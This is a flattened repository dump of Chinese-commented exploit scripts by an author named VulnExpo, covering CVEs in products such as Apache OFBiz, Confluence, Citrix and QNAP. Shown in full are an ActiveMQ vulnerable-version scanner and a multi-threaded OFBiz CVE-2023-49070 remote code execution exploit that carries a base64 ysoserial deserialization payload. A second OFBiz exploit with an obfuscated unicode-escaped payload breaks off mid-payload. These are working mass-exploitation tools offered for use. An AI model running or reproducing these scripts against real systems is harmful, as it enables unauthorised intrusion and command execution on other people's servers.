├── ActiveMQ_RCE_Vulnerability_Checker.py ├── Apache-OFBiz_CVE-2023-49070_Exploit.py ├── Apache-OFBiz_CVE-2023-51467_Exploit.py ├── Cellular_rce_exp.py ├── Confluence_CVE-2023-22515_Checker.py ├── Confluence_CVE-2023-22517_Exploit.py ├── Jorani_CVE-2023-26469_exp.py ├── LGSimpleEdiotr_CVE-2023-40498_exploit.py ├── Liferay_CVE-2020-7961_Exploit.py ├── Liferay_CVE-2020-7961_Exploit_v4.py ├── OwnCloud_CVE-2023-49105_Exploit.py ├── QNAP-NAS_CVE-2024-21889_Exploit.py ├── QNAP_CVE-2019-7192_Exploit.py ├── README.md ├── WiseGigaNAS_rce_exploit.py ├── WordPress_plugin_SupportCandy_CVE-2023-1730_exploit.py ├── citrix_CVE-2023-4966_exploit.py ├── f5_CVE-2023-46747_exploit.py ├── juniper-cve-2023-36845.py └── openfire_CVE-2023-32315_exploit.py /ActiveMQ_RCE_Vulnerability_Checker.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-10-26 3 | 4 | import socket 5 | import socks 6 | import re 7 | from distutils.version import StrictVersion 8 | import argparse 9 | import threading 10 | import warnings 11 | warnings.filterwarnings("ignore", category=DeprecationWarning) 12 | 13 | def extract_ip_port_from_url(url): 14 | url = url.replace("http://", "").replace("https://", "") 15 | 16 | parts = url.split(":") 17 | if len(parts) == 2: 18 | ip, port = parts[0], parts[1] 19 | return ip, int(port) 20 | else: 21 | print(f"无法解析 URL:{url}") 22 | return None, None 23 | 24 | def check_for_vulnerability(ip, port, proxies={}, success_file=None): 25 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | sock.connect((ip, port)) 27 | sock.settimeout(10) 28 | 29 | try: 30 | response_data = sock.recv(1024) 31 | 32 | version_match = re.search(r'ProviderVersion.*?([\d.]+)',response_data.decode('unicode_escape')) 33 | 34 | if version_match: 35 | version_str = version_match.group(1) 36 | current_version = StrictVersion(version_str) 37 | 38 | if (StrictVersion('5.18.0') <= current_version < StrictVersion('5.18.3')) or (current_version < StrictVersion('5.17.6')): 39 | with open(success_file, 'a') as s_file: 40 | s_file.write(f"++++++++++++++++++\n") 41 | s_file.write(f"目标URL: {ip}:{port}\n") 42 | s_file.write(f"漏洞版本: {current_version}\n\n") 43 | else: 44 | print(f'在 {ip}:{port} 的响应中找不到 ActiveMQ 提供程序版本') 45 | except Exception as e: 46 | print(f"发生异常:{e}") 47 | finally: 48 | sock.close() 49 | 50 | def scan_targets(urls, proxies={}, success_file=None): 51 | for url in urls: 52 | url = url.strip() 53 | ip, port = extract_ip_port_from_url(url) 54 | if ip is not None and port is not None: 55 | check_for_vulnerability(ip, port, proxies, success_file) 56 | 57 | def multi_threaded_scan(urls, proxies={}, success_file=None, num_threads=4): 58 | threads = [] 59 | for i in range(num_threads): 60 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) 61 | threads.append(thread) 62 | 63 | for thread in threads: 64 | thread.start() 65 | 66 | for thread in threads: 67 | thread.join() 68 | 69 | if __name__ == '__main__': 70 | parser = argparse.ArgumentParser(description="Apache ActiveMQ (版本 < 5.18.3) 漏洞版本检测") 71 | parser.add_argument("-u", "--url", help="目标URL") 72 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 73 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") 74 | args = parser.parse_args() 75 | 76 | if not args.url and not args.file: 77 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 78 | exit(1) 79 | 80 | if args.url: 81 | urls = [args.url] 82 | elif args.file: 83 | with open(args.file, 'r') as file: 84 | urls = file.readlines() 85 | 86 | proxies = {} 87 | success_file = 'success_targets.txt' 88 | 89 | multi_threaded_scan(urls, proxies, success_file, args.threads) 90 | 91 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 92 | -------------------------------------------------------------------------------- /Apache-OFBiz_CVE-2023-49070_Exploit.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-12-08 3 | 4 | import requests 5 | import argparse 6 | import threading 7 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) 8 | 9 | def check_for_vulnerability(url, proxies=None, success_file=None): 10 | try: 11 | vulnurl = url+"/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y" 12 | headers = { 13 | "cmd": "id" 14 | } 15 | data = ''' 16 | 17 | RCE 18 | 19 | 20 | 21 | 22 | 23 | RCE 24 | 25 | rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAFK3K/rq+AAAAMwEFCgBFAIkKAIoAiwoAigCMCgAdAI0IAHoKABsAjgoAjwCQCgCPAJEHAHsKAIoAkggAkwoAIACUCACVCACWBwCXCACYCABYBwCZCgAbAJoIAJsIAHAHAJwLABYAnQsAFgCeCABnCACfBwCgCgAbAKEHAKIKAKMApAgApQcApggApwoAIACoCACpCQAlAKoHAKsKACUArAgArQoArgCvCgAgALAIALEIALIIALMIALQIALUHALYHALcKADAAuAoAMAC5CgC6ALsKAC8AvAgAvQoALwC+CgAvAL8KACAAwAgAwQoAGwDCCgAbAMMIAMQHAGQKABsAxQgAxgcAxwgAyAgAyQcAygcBAwcAzAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAsTHlzb3NlcmlhbC9wYXlsb2Fkcy90ZW1wbGF0ZXMvVG9tY2F0Q21kRWNobzsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAzQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBAANjbHMBABFMamF2YS9sYW5nL0NsYXNzOwEABHZhcjUBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAAltCAQAJcHJvY2Vzc29yAQASTGphdmEvbGFuZy9PYmplY3Q7AQADcmVxAQAEcmVzcAEAAWoBAAFJAQABdAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAA3N0cgEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA29iagEACnByb2Nlc3NvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQABaQEABGZsYWcBAAFaAQAFZ3JvdXABABdMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEAAWYBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsBAA1TdGFja01hcFRhYmxlBwDOBwDPBwDQBwCmBwCiBwCZBwCcBwBiBwDHBwDKAQAKU291cmNlRmlsZQEAElRvbWNhdENtZEVjaG8uamF2YQwARgBHBwDQDADRANIMANMA1AwA1QDWDADXANgHAM8MANkA2gwA2wDcDADdAN4BAARleGVjDADfAOABAARodHRwAQAGdGFyZ2V0AQASamF2YS9sYW5nL1J1bm5hYmxlAQAGdGhpcyQwAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDADhANYBAAZnbG9iYWwBAA5qYXZhL3V0aWwvTGlzdAwA4gDjDADbAOQBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwA5QDmAQAQamF2YS9sYW5nL09iamVjdAcA5wwA6ADpAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2NtZAwA6gDrAQAJc2V0U3RhdHVzDADsAF4BABFqYXZhL2xhbmcvSW50ZWdlcgwARgDtAQAHb3MubmFtZQcA7gwA7wDwDADxAN4BAAN3aW4BAAdjbWQuZXhlAQACL2MBAAkvYmluL2Jhc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABGAPIMAPMA9AcA9QwA9gD3DABGAPgBAAJcQQwA+QD6DAD7AN4MAPwA/QEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwA/gD/DAEAAQEBAAhzZXRCeXRlcwwBAgDmAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24BACp5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL1RvbWNhdENtZEVjaG8BAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAVamF2YS9sYW5nL1RocmVhZEdyb3VwAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEADWdldFN1cGVyY2xhc3MBAARzaXplAQADKClJAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2lzRW1wdHkBAAMoKVoBAARUWVBFAQAEKEkpVgEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9T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 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | ''' 35 | res = requests.post(vulnurl, headers=headers, data=data, verify=False, timeout=30) 36 | res.encoding = "utf-8" 37 | if res.status_code == 200 and "uid=" in res.text: 38 | print(f"目标URL: {url} ") 39 | with open(success_file, 'a') as s_file: 40 | s_file.write(f"++++++++++++++++++\n") 41 | s_file.write(f"目标URL: {url}\n") 42 | s_file.write("响应内容: {}\n\n".format(res.text.split('\n')[0])) 43 | return True 44 | except Exception as e: 45 | print(f"发生异常:{e}") 46 | return False 47 | 48 | def scan_targets(targets, proxies=None, success_file=None): 49 | for target in targets: 50 | target = target.strip() 51 | check_for_vulnerability(target, proxies, success_file) 52 | 53 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4): 54 | threads = [] 55 | 56 | for i in range(num_threads): 57 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) 58 | threads.append(thread) 59 | 60 | for thread in threads: 61 | thread.start() 62 | 63 | for thread in threads: 64 | thread.join() 65 | 66 | if __name__ == '__main__': 67 | parser = argparse.ArgumentParser(description="Apache OFBiz XML-RPC代码执行漏洞CVE-2023-49070") 68 | parser.add_argument("-u", "--url", help="目标URL") 69 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 70 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") 71 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)") 72 | args = parser.parse_args() 73 | 74 | if not args.url and not args.file: 75 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 76 | exit(1) 77 | 78 | if args.url: 79 | urls = [args.url] 80 | elif args.file: 81 | with open(args.file, 'r') as file: 82 | urls = file.readlines() 83 | 84 | success_file = 'success_targets.txt' 85 | 86 | proxies = { 87 | "http": args.proxy, 88 | "https": args.proxy 89 | } if args.proxy else None 90 | 91 | multi_threaded_scan(urls, proxies, success_file, args.threads) 92 | 93 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 94 | -------------------------------------------------------------------------------- /Apache-OFBiz_CVE-2023-51467_Exploit.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-12-30 3 | 4 | import requests 5 | import argparse 6 | import threading 7 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) 8 | 9 | def check_for_vulnerability(url, proxies=None, success_file=None): 10 | try: 11 | vulnurl = url+"/webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y" 12 | headers = { 13 | "cmd": "id", 14 | "Content-Type": "application/x-www-form-urlencoded", 15 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", 16 | } 17 | payload = {"groovyProgram": r"\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u0078\u002e\u0073\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0063\u0072\u0069\u0070\u0074\u0045\u006e\u0067\u0069\u006e\u0065\u004d\u0061\u006e\u0061\u0067\u0065\u0072\u0028\u0029\u002e\u0067\u0065\u0074\u0045\u006e\u0067\u0069\u006e\u0065\u0042\u0079\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0073\u0022\u0029\u002e\u0065\u0076\u0061\u006c\u0028\u0022\u0074\u0072\u0079\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u006c\u006f\u0061\u0064\u0028\u005c\u0022\u006e\u0061\u0073\u0068\u006f\u0072\u006e\u003a\u006d\u006f\u007a\u0069\u006c\u006c\u0061\u005f\u0063\u006f\u006d\u0070\u0061\u0074\u002e\u006a\u0073\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0065\u0029\u0020\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u006d\u0069\u0073\u0063\u002e\u0055\u006e\u0073\u0061\u0066\u0065\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0020\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0067\u0065\u0074\u0028\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u006c\u0061\u0073\u0073\u0043\u0061\u0063\u0068\u0065\u0028\u0063\u006c\u0061\u007a\u007a\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u007a\u007a\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0028\u0063\u006c\u0061\u007a\u007a\u002c\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0052\u0065\u0073\u006f\u0075\u0072\u0063\u0065\u0041\u0073\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u005c\u0022\u0043\u006c\u0061\u0073\u0073\u002e\u0063\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0072\u0065\u0061\u0064\u0041\u006c\u006c\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u002c\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\